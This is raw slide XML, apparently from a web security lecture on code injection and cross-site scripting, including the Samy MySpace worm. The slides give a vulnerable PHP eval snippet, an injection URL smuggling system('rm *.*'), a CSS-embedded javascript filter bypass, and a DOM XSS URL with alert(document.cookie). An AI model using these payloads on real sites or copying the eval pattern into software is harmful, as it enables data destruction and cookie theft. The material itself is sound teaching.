          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack goal: execute arbitrary code on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code injection based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   (PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php        (server side calculator)</a:t>
            </a:r>
          </a:p>
          <a:p>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Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php?exp=“ 10 ; system(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> *.*’) ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849208" y="6324600"/>
            <a:ext cx="1532792" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(URL encoded)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="3657600"/>
            <a:ext cx="3505200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  $in = $_GET[‘exp']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579"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4580"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4581"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4582"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4583"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4584"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prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585"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245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458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2458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24589"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4590"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4591"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24592"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24593"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24594"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7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4019550"/>
            <a:ext cx="4953000" cy="1238250"/>
            <a:chOff x="914400" y="4019490"/>
            <a:chExt cx="4953000" cy="1238310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3332163" y="4019490"/>
              <a:ext cx="2535237"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Send bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="4857731"/>
              <a:ext cx="2535238"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Reflect it back</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304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603"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5604"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5605"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5606"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5607"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5608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25609"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25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276600"/>
            <a:ext cx="1720850" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2561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5612" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141537" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="28654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25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713038" y="37036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25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084388" y="4086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561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5618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25619" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="2301875" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="23590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3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3457575"/>
            <a:ext cx="6726238" cy="1590675"/>
            <a:chOff x="1752600" y="3457525"/>
            <a:chExt cx="6726237" cy="1590725"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943599" y="3457525"/>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Store bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="4648187"/>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Download it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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Rectangle 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1524000"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>And can hide</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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>as</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java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy had millions of friends within 24 hours.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62469" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="6467475"/>
            <a:ext cx="31892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http://namb.la/popular/tech.html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Stored XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2667000"/>
            <a:ext cx="4724400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>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27652" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1676400"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>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DOM-based XSS (no server used)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Example page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;HTML&gt;&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;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Hi &lt;SCRIPT&gt;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var pos = document.URL.indexOf("name=") + 5; document.write(document.URL.substring(pos,document.URL.length));</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&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Works fine with this URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=Joe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>But what about this one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=</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&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
